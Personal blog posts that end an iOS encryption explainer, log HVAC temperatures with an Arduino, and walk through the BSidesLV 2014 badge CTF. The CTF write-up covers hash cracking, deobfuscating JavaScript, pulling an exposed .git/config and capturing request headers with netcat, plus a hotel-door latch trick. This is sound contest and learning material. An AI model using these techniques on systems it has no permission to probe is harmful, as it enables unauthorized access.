But to my mind, any such service from Apple was always just a matter of convenience anyway. If a warrant can be issued to seize the data on a phone, then one can be issued to compel the owner of the phone to unlock it. (Yes, I’m aware that this is a legally murky area. Some recent decisions have upheld such orders, while at least one other has struck such an order down. One might be able to fight a court-imposed unlock demand, but it’d almost certainly take a lot of time, and be quite expensive in the long run). (And it should go without saying that there are very many good reasons that I am not a lawyer).

So if the police absolutely need access to the data on a phone, they can (probably) compel the owner to unlock it, and so Apple’s inability to help becomes irrelevant.

They can also (presumably) serve warrants to collect any computers belonging to that user, extract the pairing records from them, and then collect just about anything they want from the phone over USB.

Finally, much of the data on an iOS device will also exist “in the cloud” somewhere. So police can certainly go after those providers as well.

So the bottom line here is that, even without Apple’s help, law enforcement still has many ways to get at the data on a locked iOS device.

Unanswered Questions

Even with the very good documentation from Apple, several questions remain.

Where exactly does the low-level encryption happen? The iOS Security guide says that the UID is “fused” into the application co-processor, and that “no software or firmware can read them directly” (p 9), but on page 6 it says it’s stored in the “Secure Enclave” (which is not to be confused with the “Secure Element” used by NFC and Apple Pay), and that the Secure Enclave has its own software update process.

So is the UID available to the software within the Secure Enclave (SE)? Or are operations utilizing the UID handled by a “black box” within the SE, and only the results of these operations visible to SE firmware (and, as moved from SE to the main processor, to the OS in general)?

Or is it possible that the UID in the context of the Secure Enclave is not the UID used to generate the file protection keys? (If so, I sincerely hope Apple updates their naming system to clarify this, because it’s obviously confusing the heck out of a lot of us).

Has Apple ever provided brute-force passcode breaking services to law enforcement? Has iOS been modified to restrict or eliminate this attack? If not, can Apple theoretically perform such an attack today? If asked, would they refuse? Could they?

What does it all mean?

So, what’s the bottom line? Is there a “TL;DR” summary?

  1. Since the iPhone 3GS, all iOS devices have used a hardware-based AES full-disk encryption that prevents storage from being moved from one device to another, and facilitates a fast wipe of the disk.
  2. Since iOS 4 (iPhone 4), additional protections have been available using the Data Protection API (DPAPI).
  3. The DPAPI allows files to be flagged such that they are always encrypted when the device is locked, or encrypted after reboot (but not encrypted after the user enters their passcode once).
  4. On older devices (up to and including iPhone 4 and iPad 1), a bootrom bug could be exploited to boot off an external image and brute force weak passcodes, as well as read non-encrypted data from the filesystem.
  5. It remains possible (but unproven) that Apple retains the capability to do this on modern devices using a trusted external boot image.
  6. Once a user locks a device with a passcode, the class keys for “complete” encryption are wiped from memory, and so that data is unreadable, even when booting from a trusted external image.
  7. Once a user reboots a device, the “complete until first authentication” keys are lost from memory, and any files under that DPAPI protection level will be unreadable even when booted from an external image.
  8. Under iOS 8, many built-in applications received the “complete until first authentication” protection.
  9. This new protection level means that even when booting from a trusted external image, Apple cannot read data encrypted using that protection, unless they have the user’s passcode.
  10. It may still be possible to use forensic tools to extract data from a locked device. In many ways, iOS 8 behaves exactly like iOS 7 for such tools, if the user has unlocked it at least once after a reboot.
  11. The entire hierarchy of encryption keys, class keys, and keybags, is entangled with a device-specific UID that cannot be extracted from the device nor accessed by on-device software.
  12. Many of the keys are further protected by a key derived from the passcode (and the internal UID).
  13. It is not entirely clear whether the Secure Enclave can be manipulated by Apple or an attacker to bypass any or all of the encryption key hierarchy by gaining direct or indirect access to the UID or derived keys.
  14. It is also unknown whether current devices are vulnerable to a passcode brute force attack by Apple (or anyone with access to a trusted external boot image).
  15. Many of these protections are rendered (somewhat) irrelevant if law enforcement (or a determined adversary) have access to a trusted computer used to sync the device, or potentially to copies of the data existing in cloud-based services.

The bottom line, the real “too long, didn’t read”:

To sum it up in one sentence:

Internet of SCADA, or, why does my HVAC blow?

We live in a house that was new-built, so it’s got all the modern trimmings. It’s also got all the modern cut corners, including an air conditioning system (two, actually) that even 12 years later we’re still struggling with. It seems that every year or two something else goes wrong, especially with the combined cooling / heat pump unit that handles the upstairs.

I’ve been thinking for a while that I should be able to build a temperature monitor to track how the system is running, to detect problems (loss of freon, etc.) early, and maybe even forestall costly repairs. Maybe. So I asked for some Arduino gear for Christmas, and earlier this summer, I finally started playing around with it.

Then…right on schedule, in the height of the summer heat, our upstairs system stopped cooling again. Our HVAC company came out, pumped two pounds of freon into the system (I really gotta start doing that myself — far cheaper), and scheduled a comprehensive leak search for mid-September (just in case we have to disable the system for a long stretch, we wanted it to be in a season where we might not miss it).

Then just before I went to DEF CON, I noticed (using my 20-year-old Radio Shack thermometer) that the AC unit didn’t seem to be cooling as much as before. After returning, it seemed…okay…but still not ideal, so I rushed a (greatly simplified) monitoring circuit into play. I just got it working this week, and already I’m finding some interesting results.

I’m still trying to figure out the best way to sense thermostat calls for compressor, heat, and fans — do I use clip-on current sensors, inline current sensors, voltage drop sensors, opto-isolators — and how do I integrate those sensors into the 1-Wire bus… So for now, I only have a few temperature sensors.

First, some eye-candy:

Two-day Stripchart

Here, the orange line is one of two sensors on a table (in the next graph they’re individually shown as red and blue). The green line is an outside temperature taken as an average of a few web-accessible weather stations in the area (a few in nearby neighborhoods, plus Dulles airport), so it’s a reasonable approximation of the temperature near my home. Blue is the air temperature at the cold air return directly above the desk (and thermostat), and red is the supply register (output vent) directly above a window, maybe 8 feet from the other three sensors.

One important measurement is the cooling drop produced by the A/C system. Because it’s currently malfunctioning I don’t have the compressor running. But I ran it for three brief periods, about a half hour each, just to see what it looks like on the graph. This is, in fact, the primary reason I wanted to start this project. One typically expects a 10-15 degree temperature drop across an A/C unit’s cooling coil, though the actual drop from cold air return back to the room might be a little less. After we had coolant added in July, my old thermometer measured that drop at just about 10 degrees.

When the compressor ran from about 1:45-2:30 on Tuesday, the supply and return lines were at the same temperature. That is, it showed ZERO cooling effect. When run twice that evening (about 8:00 and again about 11:00) the graph shows 2, maybe 3 degrees of cooling. So, obviously, it’s broken. My long-term plan includes emailed alerts and even a beeping alarm unit for when this drop stays below some threshold… so I was glad to see what “broken” looks like so early in the system’s development.
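The alarm logic I have in mind is dead simple; something like this (the threshold and sample readings are placeholders, not a real calibration):

```python
# Sketch of the planned alarm: flag when the cooling delta across the coil
# falls below a threshold. A healthy system should drop 10-15 degrees F.
MIN_HEALTHY_DROP_F = 8.0   # placeholder threshold

def cooling_drop(return_temp_f, supply_temp_f):
    """Temperature drop from cold air return to supply register."""
    return return_temp_f - supply_temp_f

def needs_alarm(return_temp_f, supply_temp_f, compressor_on):
    """Only alarm while the compressor is actually running."""
    return compressor_on and cooling_drop(return_temp_f, supply_temp_f) < MIN_HEALTHY_DROP_F

print(needs_alarm(76.0, 66.0, compressor_on=True))   # 10 degree drop: healthy
print(needs_alarm(76.0, 74.0, compressor_on=True))   # ~2 degree drop: broken
```

Of course, this depends on that compressor-relay sensor I haven't built yet.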

What gets really fun is playing with the furnace fan. For about 90 minutes (after I first turned off the compressor) I left the fan set to “on,” that is, continuously running. The air coming out of the register by the window was consistently 5 or more degrees warmer than what went into the system at the cold air return in the same room. So either I’m getting an ambient heating effect from the vent’s location (in the ceiling, near a large window), or the duct work in the attic is heating things up significantly.

Then I turned off the furnace fan, and the register temperature continued to rise, until I switched to “Circulate,” in which the furnace fan cycles on and off. I’d had no idea how that mode actually worked (I vaguely presumed it was somewhat tied to the thermostat, and might be if the room temperature was actually close to “reasonable”) but here it seems to just be about 15 minutes on, 15 minutes off.

When the fan first kicked in, the register temperature shot up (probably expelling warm air that had been sitting in the attic ductwork), then dropped a bit, and sort of settled for a while. Then it dropped again (I guess when the fan turned off — again, I really need a sensor on that relay), and then shot back up when the fan restarted. You can really see the pattern on Wednesday afternoon, where the low temperature (fan off) seems to be about equal to the room temperature, while the high temperature climbs in a fairly obvious curve.

Finally, about 2:30 on Wednesday I switched the fan back to “constantly on” and saw the temperature rise again, but then it stabilized somewhat lower than the curve I discerned before. Perhaps the constant flow kept the air in the ductwork from warming up exponentially (like in a greenhouse) but heat was still being transferred even to the moving air.

I ended the experimenting about 4:00, when I switched the fan off completely, and the register temperature dropped back to match that of the other sensors in the room (which was pretty close to the outside temperature as well).

In fact, there’s a pretty strong correlation (well, visually, anyway…I’m not enough of a data geek to quantify that correlation) between the outside temperature and that of the air coming through the register. So again, there’s something happening here, either heating in the attic, or some halo effect near the window / ceiling location of the sensor, or maybe a little of both.

Then yesterday I tried something different.

Fan Details

Here, the red and blue lines are the sensors on the table (actually in adjacent holes on a breadboard, so it’s interesting to see the blue sensor lagging the red one), the orange is the output (register) temperature, and the green is the cold air return (about 5 feet above the table). What’s really important is the relationship between the vent and the other three (which kind of give a general ambient room temperature). (these are the default colors my RRD setup uses, not the custom setup I used when I hand-crafted the first graph from logged data).

We know that our A/C will be down for a while, so we elected to just wait until the scheduled leak test in a couple weeks…partially as an experiment in A/C-free living (which our kids don’t appreciate quite as much, BTW). So we put a window fan in the bedroom, right below the A/C register I keep referring to. Overnight, it’s set to pull cooler air in from outside. During the day, it blows air out, on the theory that it’ll pull cooler air from the basement and 1st floor, which has an HVAC system that’s still working. I don’t remember when I switched direction on the fan, but it was probably between 7:30 and 8:00.

Shortly afterwards, the register temperature climbs steadily, which isn’t surprising given the past data and the fact that this window gets full sun in the morning. Then, just to verify the previous days’ data, I turned the furnace fan to continuous on at about 1:30. The temperature at the register dropped over 5 degrees, but still remained significantly higher than the temperature in the room. I turned it back off, and the line climbed back up to resume the earlier slope. Then I had a crazy idea: What if the window fan was sucking air out of the register? I turned it off, and the temperature plummeted, back to an unsteady 2-3 degrees above the room temperature. Turning the furnace fan back on again resumed the high temperature readings from that register, higher than before, but still consistent with the rising temperatures outside (not shown on this graph). When the furnace fan was finally turned off, with the window fan still off, the temperature fell to match the rest of the sensors in the room.

With the window fan and furnace fans both turned off, today’s graph has been four very similar lines, all within about 3 degrees of yesterday’s values at the same time. Certainly, the weather today may be different from that of yesterday or the day before (it got quite cool Tuesday night due to some rains in the area), but I’m hoping that the system will show that the room temperature is a little more stable (and hopefully lower) now that I’m not sucking hot air out of the attic ductwork.

I’m also more than a little concerned about my preliminary conclusion, that the attic adds 5 or more degrees to the air as it passes through the system. If the coil is really expected to drop air temperature by 10-15 degrees, then I’m losing a full 33% efficiency just by exposure to the attic air (and these systems are so efficient to begin with). There’s a roof-mounted ventilation fan, which should be pulling some hot air out of the attic, and monitoring that (and the attic temperature in general) is on my list for this project.

But I feel like the ductwork shouldn’t be absorbing that much heat to begin with. I don’t know if it’s a function of the air return, or the air distribution, or the furnace unit itself, but it really does seem like I may need to do some work up there. Right now, it’s a rat’s nest of flexible ductwork, leading from the furnace to smaller distribution boxes to further flexible ducts, etc. All of them are running at 4-6’ above the attic floor, with long swoops and droops. I seriously wonder whether ripping that all out and installing rigid ducts, at the floor joist level and covered with heaps of blown-in insulation, might make a significant difference here.

It’s also possible that the heat increase isn’t coming from the attic at all, but from the much larger cold air return in the hallway by the kids’ rooms. I’ll need to get another sensor over there to see if that’s the case, but generally, the master bedroom (where all these other sensors are located) feels a lot warmer than the hall, so I’m still leaning towards the attic ductwork being a problem.

Either way, this is an amazing amount of information, and may already be helping me better understand and diagnose our long-running HVAC problems, all from only a couple days’ worth of logging and an Arduino-based sensor that took less than a day to cobble together (ignoring delays from a failed WiFi breakout board). I can’t wait until I have both my HVAC systems fully instrumented, with real local outdoor and attic temperatures as well.

Yay, data!

BSidesLV 2014 Badge Contest

BSidesLV 2014 Badge

I was in Las Vegas for another Security Summer Camp, and for the past 5 years a major part of that has been Security BSides, or BSidesLV. I checked in and only barely got a badge, as they had just run out (but while I was standing there looking sad, someone stepped up with an extra…crisis averted!)

It didn’t take long for me to notice a faint QR code on the back of the badge, but I didn’t bother to read where it led at this point. I hung out for a while, watched an interesting talk on PRNGs, and went back to my room at Black Hat to unwind after a long travel day.

The next morning, I looked at the contest and thought it should be fun. It generally followed a popular Jeopardy structure often seen in Capture the Flag (CTF) games, with five categories of challenges: Do It, Misc, Crack It, Decipher It, and Hack It.

Each category had five challenges, worth 10, 20, 30, 40, and 50 points. The first person to solve each challenge earned a 25% bonus as well.

One interesting twist was that it worked like a bingo board: completing five challenges in a row (across, down, or diagonal) earns a significant bingo bonus — 150 points for the first to complete a particular bingo, 100 for subsequent matching bingo sets. But to make it a little harder, the challenges were mixed up such that any valid bingo needed one of each category.
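My reading of the scoring rules, sketched out (the integer rounding of the 25% bonus is my assumption):

```python
# Contest scoring as described above: challenges are worth 10-50 points,
# the first solver gets a 25% bonus, and each bingo is worth 150 points
# for the first to complete that particular line, 100 thereafter.
def challenge_score(points, first_solve=False):
    return points + (points // 4 if first_solve else 0)   # 25% first-solve bonus

def bingo_score(first_of_its_kind):
    return 150 if first_of_its_kind else 100

print(challenge_score(40, first_solve=True))   # 40 + 10 bonus = 50
print(challenge_score(30))                     # 30
print(bingo_score(True))                       # 150
```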

Here’s what the board looked like at the beginning of the game:

Full BSidesLV Puzzle Board

Players needed to click on each square to reveal the challenge and point value (between 10 and 50 points). To earn credit for a challenge, the players simply emailed their handle, the challenge name, and their answer, and it would be manually reviewed and added to the system. The middle square (usually a “free space” in bingo) was worth ten points, and served as the entry point into the game.

I was able to solve 15 of the 25 challenges, in just under 16 hours (though for the last one, the judges ruled that I’d been given too many hints…more on that later, but it was a fair decision).

** SPOILERS BELOW ** If you’d like to try to solve some of these challenges on your own (mostly the Crypto and Password Cracking ones), go to this spoiler-free list of challenges.

Completed Challenges

Do It: CHALLENGE ACCEPTED! (10 points)

Time: 8:18 am | First solve: No | Completed by: 22 people
You've found this site, ergo you probably have a BSLV5 Badge. Send an e-mail to BSLV5@Urbane.sh with the subject "$yourhandle CHALLANGE ACCEPTED" to register.

Simply join the challenge. The overall game instructions said to include “Key: Legeneary” in the body of the email, so I did, just to be sure.

Misc: House Party (50 points)

Time: 8:21 am | First solve: No | Completed by: 5 people
Visit the first two BSides Houses and take a photo of you in front of them.

I didn’t go to the first BSides, but did make it to the second and remember it being a really great location. It took a little while to find the right addresses, but I drove by both and took a lousy selfie in front of each.

First House, BSidesLV 2009 Second House, BSidesLV 2010

Crack It: Easy Peasy (10 points)

Time: 9:00 am | First solve: No | Completed by: 19 people
MD5 7ea04a3b047bc6364839c2dd34eccbb7

I think I just googled for this one. Definitely lived up to its name — just an MD5 hash of the word “nightowl”.
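The whole “crack” fits in a few lines of Python; TARGET below is the hash from the challenge, which (per the solve above) is just the MD5 of “nightowl”:

```python
import hashlib

# Hash from the challenge; a trivial dictionary attack finds the preimage.
TARGET = "7ea04a3b047bc6364839c2dd34eccbb7"

def crack_md5(target_hex, wordlist):
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target_hex:
            return word
    return None

print(crack_md5(TARGET, ["password", "letmein", "nightowl"]))
```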

Decipher It: Knock Three Times If You’re There (30 points)

Time: 9:01 am | First solve: Yes | Completed by: 2 people

This was pretty clearly a Base-64 string. Decoding it gives… another Base-64 string: RWtWQ1JFSVZWRE0wTVJSRA==. Decoding that gives yet another: EkVCREIVVDM0MRRD. Then finally, the decoder produced a binary string. Looking at that in hex shows something kind of interesting: all the digits are between 1 and 5.

1245 4244 4215 5433 3431 1443

This, along with the challenge name, leads me to try a Knock Code:


Using the hex digits as row and column coordinates gives the answer for this challenge: “BURT REYNOLDS”.
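The “knock code” here is the classic prisoners’ tap code, and decoding it is mechanical once you know the standard 5x5 grid (which merges C and K):

```python
# Tap-code (Polybius square) decoder; the standard grid drops K (merged with C).
GRID = "ABCDEFGHIJLMNOPQRSTUVWXYZ"   # 5 rows x 5 columns

def decode_tap(digits):
    """Each pair of digits is a (row, column) coordinate into the grid."""
    pairs = [digits[i:i + 2] for i in range(0, len(digits), 2)]
    return "".join(GRID[(int(r) - 1) * 5 + (int(c) - 1)] for r, c in pairs)

digits = "1245 4244 4215 5433 3431 1443".replace(" ", "")
print(decode_tap(digits))  # BURTREYNOLDS
```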

Do It: $.02 (20 points)

Time: 9:14 am | First solve: No | Completed by: 2 people
Post an honest and detailed review online (of 1000 characters or more) of a talk you attended. Can be positive, neutral, or otherwise.

Fortunately, I had gone to a pretty interesting talk the day before, so I wrote up a quick little review and posted it. BSidesLV Mersenne Twister Talk

Crack It: LAme MAN…. (30 points)

Time: 10:01 am | First solve: No | Completed by: 9 people
LM F6853114CCD860A7823031F4926E4DEE

Another quick password cracking exercise. I found an online tool, pasted in the hash, and quickly got the answer: “KR!3GERB0TSF7W”

Decipher It: Not Quite, Julius (10 points)

Time: 10:08 am | First solve: Yes | Completed by: 3 people
Clue: 0123456789....

I immediately recognized that this was basically a Vigenère cipher, and the clue gives the key: ABCDEFGH… The result was: “GREENMANTLE”.
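With the key ABCDEFGH… each letter is just shifted by its position, so the decoder is a one-liner. The actual ciphertext was in the challenge image, so here I simply round-trip the answer (a sketch that assumes A-Z-only text):

```python
# Vigenere with the progressive key A, B, C, ...: letter i is shifted by i.
def shift_text(text, sign):
    return "".join(
        chr((ord(ch) - 65 + sign * i) % 26 + 65) for i, ch in enumerate(text)
    )

def encrypt(plain):
    return shift_text(plain, +1)

def decrypt(cipher):
    return shift_text(cipher, -1)

ct = encrypt("GREENMANTLE")
print(ct, "->", decrypt(ct))
```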

Decipher It: WOPR With Cheese (20 points)

Time: 10:40 am | First solve: Yes | Completed by: 1 person
Something seems to be off with the WOPR today. 

WOPR Image

I stared at this picture for a while but couldn’t think what to do with it. The most likely course was that the image had been changed somehow, so I found the original image. But all the text seemed unchanged. At this point I was thinking there was a message hidden using steganography or something, and kind of stopped thinking about it for a while (I hate stego :)).

So, I moved on to the “Under the Door” challenge, and called the phone number in the image. It was the front desk at the Palm hotel, so I asked for Zack’s room, thinking I would get a recorded clue. Instead, I ended up talking to SecBarbie, who seemed surprised I had called. So I didn’t walk away completely empty handed, she suggested where I should look in the image.

Sure enough, on the bottom right edge of the “Time Remaining” box, was a section of line that appeared darker than the rest. Flipping back and forth between the original and new image, it became even more apparent. I zoomed in, hoping to see a message, but instead saw a series of oddly colored pixels.

Embedded message in WOPR image

Using an image editor, I found the RGB color values for each pixel, and treated those as ASCII values, which revealed the solution: “Flag=ASD5AS3587F8H9FRT8D5F2G3”.
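The extraction step is trivial once you have the pixel values; the sample pixels below are made up to spell “Flag=A”, since I didn’t record the full list from the image:

```python
# Treat each pixel's R, G, B byte values as consecutive ASCII characters.
def pixels_to_ascii(pixels):
    return bytes(b for px in pixels for b in px).decode("ascii")

# Hypothetical sample pixels, not the actual values from the WOPR image.
sample = [(70, 108, 97), (103, 61, 65)]
print(pixels_to_ascii(sample))  # Flag=A
```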

Decipher It: Under The Door (40 points)

Time: 10:51 am | First solve: Yes | Completed by: 1 person

40 points + 10 point bonus for solving first; cumulative score: 246 points
Discovered this hidden message under my door....

Under the door

I saw this, and it was very obviously an Enigma message. The trick is to find all the correct settings for the machine, and almost everything was easily available right here. Rotor starting point: 14-23-0 (or “O-X-A” depending on the tool you use). Stecker settings: AG, BT, CZ, etc. (on the right side of the note). All that’s remaining is the rotor order (frequently rotors I, II, and III, in that order) and ring settings (many tools default to AAA or 000).

Trying with the default rotors / rings didn’t work. But there’s something written behind the scribbled out lines on the left. The top says “3-1-2” but the bottom “15-24-1”. Trying those together didn’t work, but it seems pretty likely that 3-1-2 is the correct rotor order settings. So where are the ring settings?

As described earlier, I’d tried calling the phone number on the note, but that didn’t get me the ring settings. I stared at it for a little while longer, then realized — “RING” is written directly above the area code “702”. That’s probably the ring settings. duh.

Another problem with Enigma in puzzles is that there are a lot of online tools and applets, but at least a few of them are slightly off in one way or another. Fortunately, I wrote my own some time ago, so testing many different settings is pretty trivial:

$ pbpaste | python trySetting.py  -p AG-BT-CZ-DP-EM-FW-IR-LX-NO-SU -s OXA -w 312 -r HAC

So the answer to this challenge was “ARE WE NOT DOING PHRASING ANYMORE ZF”.

Hack It: Our Bug Bounty Program (10 points)

Time: 11:39 am | First solve: No | Completed by: 5 people
Submit your best fake-bug discovery (i.e. information disclosure through copy/paste to other applications).

I really wasn’t sure how we were supposed to do this, so I replied with a real bug discovery notice, but also included a lame “Did you know that if you use a password manager you might accidentally paste your password into a group Skype chat?” kind of “disclosure.”

Apparently that wasn’t quite good enough, and as a copy/paste “bug” was used in the example, I was told to try again. I then submitted this:


There’s a horrible vulnerability in the hotel! You can open ANY room with this bug!

Take your hotel room key.

Go to any other room (for example, Sec Barbie’s room, which number i don’t know yet but I have minions trying to find it for me), and then using the card..

** shove it between the door and the door jamb.**

If you do it JUST RIGHT, in the right place, you can push the door latch over and open the door.

now you’re in the room. 

Scary, eh? You’d think they’d have fixed this by now. 

I got “C+ for effort” but was given credit for the challenge anyway. I guess I’m just not very good at creating fake bug reports.

Hack It: This Concludes Your Evaluation (30 points)

Time: 1:45 pm | First solve: No | Completed by: 4 people
Determine the successful password for http://bslv5.urbanesecurity.com/hackit2.html

This challenge presented the player with a simple web form: a single text field and a submit button. Enter the wrong value in the field, and the page just reloads. Enter the right value, and you get “Login Successful.” What’s the right value?

The submit form calls a “passcheck” function, but I couldn’t read the actual function because the script has been obfuscated. I tried some online de-obfuscation tools, but the result was still pretty hard to read. Someone suggested simply trying “eval” in a browser javascript console (which should have been obvious from the challenge name). Why worry about de-obfuscation tools when the browser will just do it for you?!? (well, there are some good reasons not to use the browser for this, but for a contest, I think it’s probably safe…)

javascript eval

That gave me the correct answer: “CyrilFiggis”.

Misc: Potent Potables (20 points)

Time: 2:01 pm | First solve: Yes | Completed by: 2 people
Take a photo of you doing a shot with a BSidesLV staff member.

I sent a friend, co-worker, and BSides Goon off in search of a shot glass to complete this (obviously easy) task, and surprisingly, he couldn’t find one anywhere on the main conference floor. But as I was heading out of the building to go back to Mandalay Bay and afternoon talks at Black Hat, I was interrupted by Todd Kimball who asked me to taste a particular whiskey he had in a coffee cup. It wasn’t a shot glass, but it was booze, and he was a staff member.

Doing a shot

Amazingly, I was the first person to complete this challenge.

Hack It: You Can’t Ignore This (20 points)

Time: 3:56 pm | First solve: No | Completed by: 3 people
Determine the key hidden at http://bslv5.urbanesecurity.com/~urbanesec/. Note: everything in /~urbanesec/* is fair game.

I was stuck on this for a long time. The page simply shows “Find the key inside this file.”

First, I tried to figure out what the “ignore” in the title meant. I knew there was something obvious that I was missing, but I just couldn’t think of it (it was like deja vu — I could sense an obvious use of “ignore” but just couldn’t pin it down…)

At one point Zack even told me “I’d work more on “You can’t ignore this”. That one is the easiest to git.” But I didn’t notice the hint.

Then sometime later, it hit me — git ignore. Duh. The key must be in there. So I tried grabbing the .gitignore file, and sure enough, there was a single file listed. But the contents of that file didn’t help at all. I thought I must need to descend into the .git folder — I should be able to find the index.php file there directly. But none of the standard folders seemed to exist, or at least, the webserver wasn’t serving them up to me. And my cellular connection (in the talk I was sitting in at the time) wasn’t being very cooperative, so half my page fetches weren’t working anyway.

Eventually, I found my way to a window and got a stronger connection, but I still couldn’t get the answer. I asked @sibios if he had any suggestions, and he helped me re-focus: he suggested I create a new git repository and look at what files are created by default. There’s a “config” file — that was the trick.
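That trick is easy to reproduce: a fresh repository shows exactly which bookkeeping files git creates by default, and each of those names is a candidate to request from an exposed .git directory. A quick sketch (Python 3 here, and it assumes git is on the PATH):

```python
import os
import subprocess
import tempfile

# Initialize an empty repository in a scratch directory and list the
# files git creates by default -- each is worth fetching from a web
# server that exposes its .git directory.
repo = tempfile.mkdtemp()
subprocess.check_call(['git', 'init', '-q', repo])
entries = sorted(os.listdir(os.path.join(repo, '.git')))
print(entries)  # includes 'HEAD', 'config', 'description', ...
```

Requesting .git/config from the challenge server is exactly what exposed the key.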

Git transcript

The answer to this stage, then, was “BurtReynoldsIsOnThePHONE!”, which gave me another 20 points, and my first bingo! At least 100 points, probably 150, but at that point I wasn’t positive whether the scoreboard was current or whether anyone had caught up to me. So, just to be sure I didn’t get caught, I kept working on the Shortener challenge…

Hack It: Short Challenge (40 points)

Time | First? | Completed by
6:18 pm | No | 4 people
Discover the key at

This one took me a long time to figure out — most of the day, in fact. The site presented a single input field; when you entered a URL, it returned a special shortened URL. My initial thinking was that I was looking for a key in the cryptographic sense, and had to figure out how the random bit at the end of the shortened URL was derived. Zack helped me out pretty early by reminding me that this was a “Hack” category, not “Crypto.”

I tried a bunch of things, looking to break the system somehow: SQLi to dump something in the table, PHP source code disclosures, etc. The tool verified that the remote site entered was valid — possibly something there. Interestingly, when you tried to shorten the shortener’s own URL, it seemed to crash.

I set up a simple Python HTTP server on a remote Linode instance, just to see what the script did — it simply sends a “GET” request for the URL entered. I thought “I should try checking the HTTP headers,” but didn’t at the time.

So I set it aside, worked on other problems, went to some talks, etc., and then some Twitter exchanges with @sibios helped me remember that I’d never actually looked at the HTTP headers presented by the shortener script. So I went back to the remote host, set up netcat listening on port 8000, and asked the tool to shorten a fake URL on that site. This is what I saw:
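Netcat works fine for this, but the same raw dump is easy to script if you want to capture it programmatically. A minimal sketch (Python 3; the function name and port are mine, not from the contest):

```python
import socket

def dump_one_request(port=8000):
    # Accept a single TCP connection and return whatever the client sends:
    # for an HTTP client, that's the request line plus all of its headers.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(('0.0.0.0', port))
    srv.listen(1)
    conn, _ = srv.accept()
    data = conn.recv(4096)
    conn.close()
    srv.close()
    return data.decode('latin-1')
```

Point the shortener at a URL on your host and the function returns the full request it makes, headers included.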

Shortener Key

So the solution to this challenge, which gave me my second bingo of the day, was “This is a pretty sweet key”.

Decipher It: One More Time (50 points)

Time | First? | Completed by
11:56 pm | Yes | 0 people (officially)

NOTE: Points not actually awarded. Had this counted for the record, would have added 50 points + 13 point bonus for solving first, with a final score of 734 points.

(A clue added later: "Remember that one time, with Ceasar, things got insane at the Ninja party?")

By now, I was pretty confident that I had done just about everything I could today, though I still really wanted to get the last crypto puzzle. But it was time to eat, so off I went to a great hacker buffet at The Wynn. While there, I returned the favor to @sibios and helped him complete Knock Three Times.

I didn’t get back to my room until 11:45, and I emailed Zack to say that I was going to give it one last try. I asked if he could give me any last hints without giving it away, and mentioned what I had tried so far.

I had decided early on that this was probably a one-time pad (OTP), but where to find the key? The later hint suggested Caesar, but I knew that for a 50-point puzzle this couldn’t be just Caesar. I tried many words and phrases, parts of the lyrics to the song “One More Time,” and just couldn’t make anything work.

At 5:30, while still trying to figure out the Shortener challenge, he told me “Here at Urbane Security, we love one time pads….almost as much as we like Caesar salads (no anchovies of course)”. It was at about this time that I noticed that “Urbane Security” had the same number of characters as the cipher text. But that alone didn’t work.

Maybe it was a two-step process, though that’s usually a lot harder on players, because you don’t get any real feedback on intermediate success. Still, just doing a simple ROT-x after the one-time pad didn’t seem too outrageous, so I checked all the possible shifts and found nothing.

“Security BSides” also had the right number of letters, so I played with that for a while. I tried shifting each key and then using it with the OTP, or using one for the OTP and another for a keyed Caesar, or the same parts in the other order, etc. Finally, I simply gave up in favor of food.

But now I was back in my room and had described some of all that (in greatly abbreviated form) to Zack.

On Wed, Aug 6, 2014 at 11:52 PM, Zack Fasel wrote:
> "also tried using urbanesecurity as the OTP and 
> then rotating the output through all 26 (25, 
> but whatever) shifts"


Ha! I must have been on the right track after all. I tried reviewing my steps, and was in the middle of responding with some examples of what I’d tried, when he sent another note:

try it with rot 3 and let me know if it starts with "ILL"

I saw the ROT-3 but not the other part… and, squinting at the screen, saw the answer.

The correct solution was “ILLGOFETCHARUG” (“I’ll go fetch a rug.”). Zack sent along this Sterling Archer video too, by way of explanation. Which confirms that I should definitely watch this show. (I somehow suspect a lot of the other answers came from this same source).
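For the record, the scheme is trivial to reconstruct after the fact. I never kept the original ciphertext, so this sketch (Python 3) just round-trips the known answer through my understanding of the scheme (pad with “URBANESECURITY”, then shift by 3; the order of the two steps is my assumption):

```python
def caesar(text, n):
    # Shift each uppercase letter by n positions (mod 26)
    return ''.join(chr((ord(c) - 65 + n) % 26 + 65) for c in text)

def pad(text, key, sign):
    # Letter-by-letter key addition: sign=+1 applies the pad, sign=-1 removes it
    return ''.join(chr((ord(c) - 65 + sign * (ord(k) - 65)) % 26 + 65)
                   for c, k in zip(text, key))

ANSWER = 'ILLGOFETCHARUG'  # "I'll go fetch a rug."
KEY    = 'URBANESECURITY'  # same length as the ciphertext

cipher = caesar(pad(ANSWER, KEY, +1), 3)   # my guess at the encryption order
plain  = pad(caesar(cipher, -3), KEY, -1)  # invert: un-shift, then remove pad
print(cipher, plain)
```

Whatever order the contest actually used, the decryption is just the two inverse operations applied in reverse.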

But hadn’t I tried exactly this before? Scrollback confirmed it — I had totally missed it, hours before:

Totally missed this

In the end, Zack felt that he’d given me too many hints (especially the last “look at ROT-3” suggestion), and he wasn’t sure he should give me credit for it. Which I can kind of understand. Having another box checked off would’ve been nice, but the fact is I completely missed it before, and quite possibly could have missed it again. Skimming the output, glancing at the start and end of each line, “ILLGOFE…” and “…HARUG” just don’t jump out. So it’s pretty easy to miss.

Challenges I didn’t complete

Do It: Pick 3 (40 points)

Time | First? | Completed by
n/a | n/a | 0 people
Submit a photo of signed evidence that you picked 3 Locks comprising of Easy (3 pin), Medium (5 pin), and hard (5 pin + 2 security pins) in 7 minutes or less in the lockpick area.

Crack It: Don’t Eat That! (50 points)

Time | First? | Completed by
n/a | n/a | 0 people
Crack this admin's password: 01c1fe5112f563e030f6aba0f51be085

Zack provided me with the answer so I could share it here: “Trufflepig1986?”.

$ python
Python 2.7.5 (default, Mar  9 2014, 22:15:05) 
[GCC 4.2.1 Compatible Apple LLVM 5.0 (clang-500.0.68)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> import hashlib, binascii
>>> hash = hashlib.new('md4', 'Trufflepig1986?'.encode('utf-16le')).digest()
>>> binascii.b2a_hex(hash)
'01c1fe5112f563e030f6aba0f51be085'

Misc: Jack and Coke? (40 points)

Time | First? | Completed by
n/a | n/a | 1 person
Take a photo of yourself with a signature drink vessel at Jack Daniels signature Las Vegas drinking establishment.

Misc: Cannoonnballll! (10 points)

Time | First? | Completed by
n/a | n/a | 0 people
Take a video (must be a video) of you taking a cannonball jump into the pool.

